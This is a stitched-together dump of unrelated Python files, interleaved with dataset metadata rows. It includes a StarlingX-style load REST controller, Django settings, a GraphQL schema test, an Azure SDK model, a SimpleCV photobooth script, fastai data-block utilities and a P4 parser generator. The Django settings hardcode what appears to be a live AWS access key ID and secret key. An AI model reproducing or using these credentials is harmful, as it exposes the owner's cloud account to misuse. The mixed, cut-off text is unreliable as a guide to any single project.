class Load(base.APIBase):
"""API representation of a Load
This class enforces type checking and value constraints, and converts
between the internal object model and the API representation of an
Load.
"""
id = int
"The id of the Load"
uuid = types.uuid
"Unique UUID for this Load"
state = wtypes.text
"Represents the current state of the Load"
software_version = wtypes.text
"Represents the software version of the Load"
compatible_version = wtypes.text
"Represents the compatible version of the Load"
required_patches = wtypes.text
"A list of the patches required to upgrade to this load"
def __init__(self, **kwargs):
self.fields = objects.load.fields.keys()
for k in self.fields:
setattr(self, k, kwargs.get(k))
@classmethod
def convert_with_links(cls, rpc_load, expand=True):
load = Load(**rpc_load.as_dict())
load_fields = ['id', 'uuid', 'state', 'software_version',
'compatible_version', 'required_patches'
]
if not expand:
load.unset_fields_except(load_fields)
load.links = [link.Link.make_link('self', pecan.request.host_url,
'loads', load.uuid),
link.Link.make_link('bookmark',
pecan.request.host_url,
'loads', load.uuid, bookmark=True)
]
return load
class LoadCollection(collection.Collection):
"""API representation of a collection of Load objects."""
loads = [Load]
"A list containing Load objects"
def __init__(self, **kwargs):
self._type = 'loads'
@classmethod
def convert_with_links(cls, rpc_loads, limit, url=None,
expand=False, **kwargs):
collection = LoadCollection()
collection.loads = [Load.convert_with_links(p, expand)
for p in rpc_loads]
collection.next = collection.get_next(limit, url=url, **kwargs)
return collection
LOCK_NAME = 'LoadController'
class LoadController(rest.RestController):
"""REST controller for Loads."""
_custom_actions = {
'detail': ['GET'],
'import_load': ['POST'],
}
def __init__(self):
self._api_token = None
def _get_loads_collection(self, marker, limit, sort_key, sort_dir,
expand=False, resource_url=None):
limit = utils.validate_limit(limit)
sort_dir = utils.validate_sort_dir(sort_dir)
marker_obj = None
if marker:
marker_obj = objects.load.get_by_uuid(
pecan.request.context,
marker)
loads = pecan.request.dbapi.load_get_list(
limit, marker_obj,
sort_key=sort_key,
sort_dir=sort_dir)
return LoadCollection.convert_with_links(loads, limit,
url=resource_url,
expand=expand,
sort_key=sort_key,
sort_dir=sort_dir)
@wsme_pecan.wsexpose(LoadCollection, types.uuid, int, wtypes.text,
wtypes.text)
def get_all(self, marker=None, limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of loads."""
return self._get_loads_collection(marker, limit, sort_key, sort_dir)
@wsme_pecan.wsexpose(LoadCollection, types.uuid, int, wtypes.text,
wtypes.text)
def detail(self, marker=None, limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of loads with detail."""
parent = pecan.request.path.split('/')[:-1][-1]
if parent != "loads":
raise exception.HTTPNotFound
expand = True
resource_url = '/'.join(['loads', 'detail'])
return self._get_loads_collection(marker, limit, sort_key, sort_dir,
expand, resource_url)
@wsme_pecan.wsexpose(Load, six.text_type)
def get_one(self, load_uuid):
"""Retrieve information about the given Load."""
rpc_load = objects.load.get_by_uuid(
pecan.request.context, load_uuid)
return Load.convert_with_links(rpc_load)
@staticmethod
def _new_load_semantic_checks(load):
if not load['software_version']:
raise wsme.exc.ClientSideError(
_("Load missing software_version key"))
if load['state']:
raise wsme.exc.ClientSideError(
_("Can not set state during create"))
@cutils.synchronized(LOCK_NAME)
@wsme_pecan.wsexpose(Load, body=Load)
def post(self, load):
"""Create a new Load."""
# This method is only used to populate the inital load for the system
# This is invoked during config_controller
# Loads after the first are added via import
loads = pecan.request.dbapi.load_get_list()
if loads:
raise wsme.exc.ClientSideError(_("Aborting. Active load exits."))
patch = load.as_dict()
self._new_load_semantic_checks(patch)
patch['state'] = ACTIVE_LOAD_STATE
try:
new_load = pecan.request.dbapi.load_create(patch)
# Controller-0 is added to the database before we add this load
# so we must add a host_upgrade entry for (at least) controller-0
hosts = pecan.request.dbapi.ihost_get_list()
for host in hosts:
values = dict()
values['forihostid'] = host.id
values['software_load'] = new_load.id
values['target_load'] = new_load.id
pecan.request.dbapi.host_upgrade_create(host.id,
new_load.software_version,
values)
except exception.SysinvException as e:
LOG.exception(e)
raise wsme.exc.ClientSideError(_("Invalid data"))
return load.convert_with_links(new_load)
@wsme_pecan.wsexpose(Load, body=LoadImportType)
def import_load(self, body):
"""Create a new Load."""
# Only import loads on controller-0. This is required because the load
# is only installed locally and we will be booting controller-1 from
# this load during the upgrade.
if socket.gethostname() != constants.CONTROLLER_0_HOSTNAME:
raise wsme.exc.ClientSideError(_(
"load-import rejected: A load can only be imported "
"when %s is active." % constants.CONTROLLER_0_HOSTNAME))
import_data = body.as_dict()
path_to_iso = import_data['path_to_iso']
path_to_sig = import_data['path_to_sig']
try:
new_load = pecan.request.rpcapi.start_import_load(
pecan.request.context, path_to_iso, path_to_sig)
except common.RemoteError as e:
# Keep only the message raised originally by sysinv conductor.
raise wsme.exc.ClientSideError(str(e.value))
if new_load is None:
raise wsme.exc.ClientSideError(
_("Error importing load. Load not found"))
try:
pecan.request.rpcapi.import_load(
pecan.request.context, path_to_iso, new_load)
except common.RemoteError as e:
# Keep only the message raised originally by sysinv conductor.
raise wsme.exc.ClientSideError(str(e.value))
return Load.convert_with_links(new_load)
@cutils.synchronized(LOCK_NAME)
@wsme.validate(six.text_type, [LoadPatchType])
@wsme_pecan.wsexpose(Load, six.text_type,
body=[LoadPatchType])
def patch(self, load_id, patch):
"""Update an existing load."""
# TODO (dsulliva)
# This is a stub. We will need to place reasonable limits on what can
# be patched as we add to the upgrade system. This portion of the API
# likely will not be publicly accessible.
rpc_load = objects.load.get_by_uuid(pecan.request.context, load_id)
utils.validate_patch(patch)
patch_obj = jsonpatch.JsonPatch(patch)
try:
load = Load(**jsonpatch.apply_patch(rpc_load.as_dict(), patch_obj))
except utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
fields = objects.load.fields
for field in fields:
if rpc_load[field] != getattr(load, field):
rpc_load[field] = getattr(load, field)
rpc_load.save()
return Load.convert_with_links(rpc_load)
@cutils.synchronized(LOCK_NAME)
@wsme_pecan.wsexpose(None, six.text_type, status_code=204)
def delete(self, load_id):
"""Delete a load."""
load = pecan.request.dbapi.load_get(load_id)
# make sure the load isn't in use by an upgrade
try:
upgrade = pecan.request.dbapi.software_upgrade_get_one()
except exception.NotFound:
pass
else:
if load.id == upgrade.to_load or load.id == upgrade.from_load:
raise wsme.exc.ClientSideError(
_("Unable to delete load, load in use by upgrade"))
# make sure the load isn't used by any hosts
hosts = pecan.request.dbapi.host_upgrade_get_list()
for host in hosts:
if host.target_load == load.id or host.software_load == load.id:
raise wsme.exc.ClientSideError(_(
"Unable to delete load, load in use by host (id: %s)")
% host.forihostid)
cutils.validate_load_for_delete(load)
pecan.request.rpcapi.delete_load(pecan.request.context, load_id)
| 34.100575 | 82 | 0.6165 |
72a925c649f9b430faf270d395076c25bb211eea | 4,262 | py | Python | resume/settings.py | KamilJakubczak/Resume | 6c4907f11d50e12efb8d0ea181dd0023fe254753 | [
"MIT"
] | null | null | null | resume/settings.py | KamilJakubczak/Resume | 6c4907f11d50e12efb8d0ea181dd0023fe254753 | [
"MIT"
] | null | null | null | resume/settings.py | KamilJakubczak/Resume | 6c4907f11d50e12efb8d0ea181dd0023fe254753 | [
"MIT"
] | null | null | null | """
Django settings for resume project.
Generated by 'django-admin startproject' using Django 3.0.10.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
SECRETS = {
'SECRET_KEY': None,
'DEBUG': None,
'DB_PASS': None,
'DB_NAME': None,
'DB_USER': None,
'DB_HOST': None,
'DB_PORT': None,
'AWS_BUCKET': None,
'AWS_ID': None,
'AWS_KEY': None,
}
# Set environment variables for Travis Cl tests
for secret in SECRETS.keys():
try:
SECRETS[secret] = os.environ[secret]
except KeyError:
SECRETS[secret] = 'travis'
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = SECRETS['SECRET_KEY']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = SECRETS['DEBUG']
ALLOWED_HOSTS = ['kamil-jakubczak.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'cv',
'frontend',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'resume.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'resume.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': SECRETS['DB_NAME'],
'USER': SECRETS['DB_USER'],
'PASSWORD': SECRETS['DB_PASS'],
'HOST': SECRETS['DB_HOST'],
'PORT': SECRETS['DB_PORT'],
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
AWS_STORAGE_BUCKET_NAME = 'kamil-jakubczak-static'
AWS_S3_REGION_NAME = 'eu-central-1'
AWS_ACCESS_KEY_ID = 'AKIAQT55NUKGUQRUCZ3F'
AWS_SECRET_ACCESS_KEY = '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'
| 26.308642 | 91 | 0.691929 |
d6b6581f63724aa0fccaadea572cac66fe861661 | 2,099 | py | Python | tests/functional/regressions/test_issue160.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 530 | 2019-06-04T11:45:36.000Z | 2022-03-31T09:29:56.000Z | tests/functional/regressions/test_issue160.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 242 | 2019-06-04T11:53:08.000Z | 2022-03-28T07:06:27.000Z | tests/functional/regressions/test_issue160.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | [
"MIT"
] | 36 | 2019-06-21T06:40:27.000Z | 2021-11-04T13:11:16.000Z | import pytest
from tartiflette import create_engine
from tartiflette.types.exceptions.tartiflette import GraphQLSchemaError
@pytest.mark.asyncio
async def test_issue160():
with pytest.raises(
GraphQLSchemaError,
match="""
0: Field < F.a > is Invalid: the given Type < G > does not exist!
1: Field < C.a > is missing as defined in the < Bob > Interface.
2: Type < D > implements < Richard > which does not exist!
3: Type < J > implements < F > which is not an interface!
4: Field < K.a > should be of Type < String > as defined in the < Bob > Interface.
5: Missing Query Type < Query >.
6: Missing Mutation Type < MutationType >.
7: Missing Subscription Type < SubscriptionType >.
8: Type < R > has no fields.
9: Union Type < H > contains itself.
10: Scalar < E > is missing an implementation
11: Argument < arg > of Field < L.aField > is of type < LL > which is not a Scalar, an Enum or an InputObject
12: Argument < arg > of Directive < m > is of type < LL > which is not a Scalar, an Enum or an InputObject
13: Field < N.b > is of type < L > which is not a Scalar, an Enum or an InputObject""",
):
await create_engine(
"""
type R
interface Bob {
a: String
}
type C implements Bob {
b: Int
}
type D implements Richard {
e: String
}
type F {
a: G
}
union H = H | F | G
type J implements F {
g: F
}
type K implements Bob {
a: Int
}
schema {
query: Query
mutation: MutationType
subscription: SubscriptionType
}
scalar E
enum I {
TATA
TITI
TOTO
J
}
type LL {
a: String
}
type L {
aField(arg: LL!): Int
}
directive @m(arg: LL!) on SCHEMA
input N {
a: String
b: L
}
""",
schema_name="test_issue160",
)
| 23.322222 | 109 | 0.5293 |
f690eeb94b80f151d6968d31e21c0385a2443863 | 209 | py | Python | ex12.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | ex12.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | ex12.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | age = input("How old are you? ")
height = input("How tall are you? ")
weight = input("How much do you weigh? ")
print (f"So, you're {age} old, {height} tall and {weight} heavy." .format(age, height, weight))
| 34.833333 | 95 | 0.650718 |
8ad1e1185513767643ccdd7d104050df9adaab69 | 2,906 | py | Python | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/ip_configuration.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2021-09-07T18:36:04.000Z | 2021-09-07T18:36:04.000Z | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/ip_configuration.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 2 | 2019-10-02T23:37:38.000Z | 2020-10-02T01:17:31.000Z | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/ip_configuration.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class IPConfiguration(SubResource):
"""IP configuration.
:param id: Resource ID.
:type id: str
:param private_ip_address: The private IP address of the IP configuration.
:type private_ip_address: str
:param private_ip_allocation_method: The private IP allocation method.
Possible values are 'Static' and 'Dynamic'. Possible values include:
'Static', 'Dynamic'
:type private_ip_allocation_method: str or
~azure.mgmt.network.v2018_12_01.models.IPAllocationMethod
:param subnet: The reference of the subnet resource.
:type subnet: ~azure.mgmt.network.v2018_12_01.models.Subnet
:param public_ip_address: The reference of the public IP resource.
:type public_ip_address:
~azure.mgmt.network.v2018_12_01.models.PublicIPAddress
:param provisioning_state: Gets the provisioning state of the public IP
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: The name of the resource that is unique within a resource
group. This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'private_ip_address': {'key': 'properties.privateIPAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'properties.privateIPAllocationMethod', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'Subnet'},
'public_ip_address': {'key': 'properties.publicIPAddress', 'type': 'PublicIPAddress'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(IPConfiguration, self).__init__(**kwargs)
self.private_ip_address = kwargs.get('private_ip_address', None)
self.private_ip_allocation_method = kwargs.get('private_ip_allocation_method', None)
self.subnet = kwargs.get('subnet', None)
self.public_ip_address = kwargs.get('public_ip_address', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
| 46.126984 | 103 | 0.65554 |
4c9fcb3cca3cc8d9a33f13ba961cbe150227144e | 1,389 | py | Python | showers/pi/examples/ch09/photobooth.py | Playaowl/artworks | bfe2abc844851ce054e1233261364a502cd30561 | [
"MIT"
] | 1 | 2020-08-14T01:03:47.000Z | 2020-08-14T01:03:47.000Z | showers/pi/examples/ch09/photobooth.py | Playaowl/artworks | bfe2abc844851ce054e1233261364a502cd30561 | [
"MIT"
] | null | null | null | showers/pi/examples/ch09/photobooth.py | Playaowl/artworks | bfe2abc844851ce054e1233261364a502cd30561 | [
"MIT"
] | null | null | null | from time import sleep, time
from SimpleCV import Camera, Image, Display
import RPi.GPIO as GPIO
myCamera = Camera(prop_set={'width':320, 'height': 240})
myDisplay = Display(resolution=(320, 240))
stache = Image("mustache.png")
stacheMask = stache.createBinaryMask(color1=(0,0,0), color2=(254,254,254))
stacheMask = stacheMask.invert()
GPIO.setmode(GPIO.BCM)
GPIO.setup(24, GPIO.IN)
def mustachify(frame):
faces = frame.findHaarFeatures('face')
if faces:
for face in faces:
print "Face at: " + str(face.coordinates())
myFace = face.crop()
noses = myFace.findHaarFeatures('nose')
if noses:
nose = noses.sortArea()[-1]
print "Nose at: " + str(nose.coordinates())
xmust = face.points[0][0] + nose.x - (stache.width/2)
ymust = face.points[0][1] + nose.y + (stache.height/3)
else:
return frame
frame = frame.blit(stache, pos=(xmust, ymust), mask=stacheMask)
return frame
else:
return frame
while not myDisplay.isDone():
inputValue = GPIO.input(24)
frame = myCamera.getImage()
if inputValue == True:
frame = mustachify(frame)
frame.save("mustache-" + str(time()) + ".jpg")
frame = frame.flipHorizontal()
frame.show()
sleep(3)
else:
frame = frame.flipHorizontal()
frame.save(myDisplay)
sleep(.05) | 30.866667 | 74 | 0.62059 |
9a6ca649d8a566f6583341846bad76528c2c8f19 | 7,418 | py | Python | dev_course/dl2/exp/nb_08.py | nebgor/fastai_docs | 9daa76023b701df07557332ef5e37d12f6e78828 | [
"Apache-2.0"
] | null | null | null | dev_course/dl2/exp/nb_08.py | nebgor/fastai_docs | 9daa76023b701df07557332ef5e37d12f6e78828 | [
"Apache-2.0"
] | null | null | null | dev_course/dl2/exp/nb_08.py | nebgor/fastai_docs | 9daa76023b701df07557332ef5e37d12f6e78828 | [
"Apache-2.0"
] | null | null | null |
#################################################
### THIS FILE WAS AUTOGENERATED! DO NOT EDIT! ###
#################################################
# file to edit: dev_nb/08_data_block.ipynb
from exp.nb_07 import *
import PIL,os,mimetypes
Path.ls = lambda x: list(x.iterdir())
image_extensions = set(k for k,v in mimetypes.types_map.items() if v.startswith('image/'))
def setify(o): return o if isinstance(o,set) else set(listify(o))
def _get_files(parent, p, fs, extensions=None):
p = Path(p)
extensions = setify(extensions)
low_extensions = [e.lower() for e in extensions]
res = [p/f for f in fs if not f.startswith('.')
and ((not extensions) or f'.{f.split(".")[-1].lower()}' in low_extensions)]
return res
def get_files(path, extensions=None, recurse=False, include=None):
path = Path(path)
extensions = setify(extensions)
if recurse:
res = []
for p,d,f in os.walk(path): # returns (dirpath, dirnames, filenames)
if include is not None: d[:] = [o for o in d if o in include]
else: d[:] = [o for o in d if not o.startswith('.')]
res += _get_files(path, p, f, extensions)
return res
else:
f = [o.name for o in os.scandir(path) if o.is_file()]
return _get_files(path, path, f, extensions)
def compose(x, funcs, *args, order_key='_order', **kwargs):
key = lambda o: getattr(o, order_key, 0)
for f in sorted(listify(funcs), key=key): x = f(x, **kwargs)
return x
class ItemList(ListContainer):
def __init__(self, items, path='.', tfms=None):
super().__init__(items)
self.path,self.tfms = Path(path),tfms
def __repr__(self): return f'{super().__repr__()}\nPath: {self.path}'
def new(self, items): return self.__class__(items, self.path, tfms=self.tfms)
def get(self, i): return i
def _get(self, i): return compose(self.get(i), self.tfms)
def __getitem__(self, idx):
res = super().__getitem__(idx)
if isinstance(res,list): return [self._get(o) for o in res]
return self._get(res)
class ImageItemList(ItemList):
@classmethod
def from_files(cls, path, extensions=None, recurse=True, include=None, **kwargs):
if extensions is None: extensions = image_extensions
return cls(get_files(path, extensions, recurse=recurse, include=include), path, **kwargs)
def get(self, fn): return PIL.Image.open(fn)
class Transform(): _order=0
class MakeRGB(Transform):
def __call__(self, item): return item.convert('RGB')
def make_rgb(item): return item.convert('RGB')
def grandparent_splitter(fn, valid_name='valid', train_name='train'):
gp = fn.parent.parent.name
return True if gp==valid_name else False if gp==train_name else None
def split_by_func(ds, f):
items = ds.items
mask = [f(o) for o in items]
# `None` values will be filtered out
train = [o for o,m in zip(items,mask) if m==False]
valid = [o for o,m in zip(items,mask) if m==True ]
return train,valid
class SplitData():
def __init__(self, train, valid): self.train,self.valid = train,valid
@property
def path(self): return self.train.path
@classmethod
def split_by_func(cls, il, f):
lists = map(il.new, split_by_func(il, f))
return cls(*lists)
def __repr__(self): return f'{self.__class__.__name__}\nTrain: {self.train}\nValid: {self.valid}\n'
from collections import OrderedDict
def uniqueify(x, sort=False):
res = list(OrderedDict.fromkeys(x).keys())
if sort: res.sort()
return res
class Processor():
def process(self, items): return items
class CategoryProcessor(Processor):
def __init__(self): self.vocab=None
def proc1(self, item): return self.otoi[item]
def deproc1(self, idx): return self.vocab[idx]
def process(self, items):
if self.vocab is None:
self.vocab = uniqueify(items)
self.otoi = {v:k for k,v in enumerate(self.vocab)}
return [self.proc1(o) for o in items]
def deprocess(self, idxs):
assert self.vocab is not None
return [self.deproc1(idx) for idx in idxs]
class ProcessedItemList(ListContainer):
def __init__(self, inputs, processor):
self.processor = processor
items = processor.process(inputs)
super().__init__(items)
def obj(self, idx):
res = self[idx]
if isinstance(res,(tuple,list,Generator)): return self.processor.deprocess(res)
return self.processor.deproc1(idx)
def parent_labeler(fn): return fn.parent.name
def _label_by_func(ds, f): return [f(o) for o in ds.items]
class LabeledData():
def __init__(self, x, y): self.x,self.y = x,y
def __repr__(self): return f'{self.__class__.__name__}\nx: {self.x}\ny: {self.y}\n'
def __getitem__(self,idx): return self.x[idx],self.y[idx]
def __len__(self): return len(self.x)
@classmethod
def label_by_func(cls, sd, f, proc=None):
labels = _label_by_func(sd, f)
proc_labels = ProcessedItemList(labels, proc)
return cls(sd, proc_labels)
def label_by_func(sd, f):
proc = CategoryProcessor()
train = LabeledData.label_by_func(sd.train, f, proc)
valid = LabeledData.label_by_func(sd.valid, f, proc)
return SplitData(train,valid)
class ResizeFixed(Transform):
_order=10
def __init__(self,size):
if isinstance(size,int): size=(size,size)
self.size = size
def __call__(self, item): return item.resize(self.size, PIL.Image.BILINEAR)
def to_byte_tensor(item):
res = torch.ByteTensor(torch.ByteStorage.from_buffer(item.tobytes()))
w,h = item.size
return res.view(h,w,-1).permute(2,0,1)
to_byte_tensor._order=20
def to_float_tensor(item): return item.float().div_(255.)
to_float_tensor._order=30
def show_image(im, figsize=(3,3)):
plt.figure(figsize=figsize)
plt.axis('off')
plt.imshow(im.permute(1,2,0))
class DataBunch():
def __init__(self, train_dl, valid_dl, c_in=None, c_out=None):
self.train_dl,self.valid_dl,self.c_in,self.c_out = train_dl,valid_dl,c_in,c_out
@property
def train_ds(self): return self.train_dl.dataset
@property
def valid_ds(self): return self.valid_dl.dataset
def normalize_chan(x, mean, std):
return (x-mean[...,None,None]) / std[...,None,None]
_m = tensor([0.47, 0.48, 0.45])
_s = tensor([0.29, 0.28, 0.30])
norm_imagenette = partial(normalize_chan, mean=_m.cuda(), std=_s.cuda())
import math
def next_pow_2(x): return 2**math.ceil(math.log2(x))
def get_cnn_layers(data, nfs, layer, **kwargs):
def f(ni, nf, stride=2): return layer(ni, nf, 3, stride=stride, **kwargs)
l1 = data.c_in
l2 = next_pow_2(l1*2)
layers = [f(l1 , l2 , stride=1),
f(l2 , l2*2, stride=1),
f(l2*2, l2*4, stride=1)]
nfs = [l2*4] + nfs
layers += [f(nfs[i], nfs[i+1]) for i in range(len(nfs)-1)]
layers += [nn.AdaptiveAvgPool2d(1), Lambda(flatten),
nn.Linear(nfs[-1], data.c_out),
nn.BatchNorm1d(data.c_out)]
return layers
def get_cnn_model(data, nfs, layer, **kwargs):
return nn.Sequential(*get_cnn_layers(data, nfs, layer, **kwargs))
def get_learn_run(nfs, data, lr, layer, cbs=None, opt_func=None, **kwargs):
model = get_cnn_model(data, nfs, layer, **kwargs)
init_cnn(model)
return get_runner(model, data, lr=lr, cbs=cbs, opt_func=opt_func) | 33.718182 | 103 | 0.644918 |
8dcf763c5f4437b43b08d5240f2ee2ba01255c54 | 33 | py | Python | helper.py | SreyaKamineni/cs3240-labdemo | 8a31ef331e4784f30a9d9da8f089c024d30409b4 | [
"MIT"
] | null | null | null | helper.py | SreyaKamineni/cs3240-labdemo | 8a31ef331e4784f30a9d9da8f089c024d30409b4 | [
"MIT"
] | null | null | null | helper.py | SreyaKamineni/cs3240-labdemo | 8a31ef331e4784f30a9d9da8f089c024d30409b4 | [
"MIT"
] | null | null | null |
def greetings(msg):
print(msg) | 11 | 19 | 0.69697 |
adb90d66963ebe687f2d029c6d677c8b2a36c446 | 10,360 | py | Python | build/util/desugared_compiler/parser.c.desugared.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | build/util/desugared_compiler/parser.c.desugared.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | build/util/desugared_compiler/parser.c.desugared.py | Anmol-007/l2l3_ACL_cartesian_product | 730f07f2c7ff4cdcd482a25491d8bd3883c835e1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 Eotvos Lorand University, Budapest, Hungary
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import p4_hlir.hlir.p4 as p4
from utils.hlir import *
from utils.misc import addError, addWarning
def format_state(state):
generated_code = ""
if isinstance(state, p4.p4_parse_state):
generated_code += " return parse_state_" + str(state.name) + "(pd, buf, tables);// sugar@21\n"
elif isinstance(state, p4.p4_parser_exception):
print "Parser exceptions are not supported yet."
else: #Control function (parsing is finished)
generated_code += " {// sugar@25\n"
generated_code += " if(verify_packet(pd)) p4_pe_checksum(pd);// sugar@26\n"
generated_code += " " + str(format_p4_node(state)) + "// sugar@27\n"
generated_code += " }// sugar@28\n"
return generated_code
def get_key_byte_width(branch_on):
"""
:param branch_on: list of union(p4_field, tuple)
:rtype: int
"""
key_width = 0
for switch_ref in branch_on:
if type(switch_ref) is p4.p4_field:
if not is_vwf(switch_ref): #Variable width field in parser return select statement is not supported
key_width += (switch_ref.width+7)/8
elif type(switch_ref) is tuple:
key_width += max(4, (switch_ref[1] + 7) / 8)
return key_width
pe_dict = { "p4_pe_index_out_of_bounds" : None,
"p4_pe_out_of_packet" : None,
"p4_pe_header_too_long" : None,
"p4_pe_header_too_short" : None,
"p4_pe_unhandled_select" : None,
"p4_pe_checksum" : None,
"p4_pe_default" : None }
pe_default = p4.p4_parser_exception(None, None)
pe_default.name = "p4_pe_default"
pe_default.return_or_drop = p4.P4_PARSER_DROP
for pe_name, pe in pe_dict.items():
pe_dict[pe_name] = pe_default
for pe_name, pe in hlir.p4_parser_exceptions.items():
pe_dict[pe_name] = pe
generated_code += " #include \"dpdk_lib.h\"// sugar@62\n"
generated_code += " #include \"actions.h\" // apply_table_* and action_code_*// sugar@63\n"
generated_code += "\n"
generated_code += " extern int verify_packet(packet_descriptor_t* pd);// sugar@65\n"
generated_code += "\n"
generated_code += " void print_mac(uint8_t* v) { printf(\"%02hhX:%02hhX:%02hhX:%02hhX:%02hhX:%02hhX\\n\", v[0], v[1], v[2], v[3], v[4], v[5]); }// sugar@67\n"
generated_code += " void print_ip(uint8_t* v) { printf(\"%d.%d.%d.%d\\n\",v[0],v[1],v[2],v[3]); }// sugar@68\n"
generated_code += " \n"
for pe_name, pe in pe_dict.items():
generated_code += " static inline void " + str(pe_name) + "(packet_descriptor_t *pd) {// sugar@72\n"
if pe.return_or_drop == p4.P4_PARSER_DROP:
generated_code += " pd->dropped = 1;// sugar@74\n"
else:
format_p4_node(pe.return_or_drop)
generated_code += " }// sugar@77\n"
for hi_name, hi in hlir.p4_header_instances.items():
hi_prefix = hdr_prefix(hi.name)
generated_code += " static void// sugar@81\n"
generated_code += " extract_header_" + str(hi) + "(uint8_t* buf, packet_descriptor_t* pd) {// sugar@82\n"
generated_code += " pd->headers[" + str(hi_prefix) + "].pointer = buf;// sugar@83\n"
if isinstance(hi.header_type.length, p4.p4_expression):
generated_code += " uint32_t hdr_length = " + str(format_expr(resolve_field_ref(hlir, hi, hi.header_type.length))) + ";// sugar@85\n"
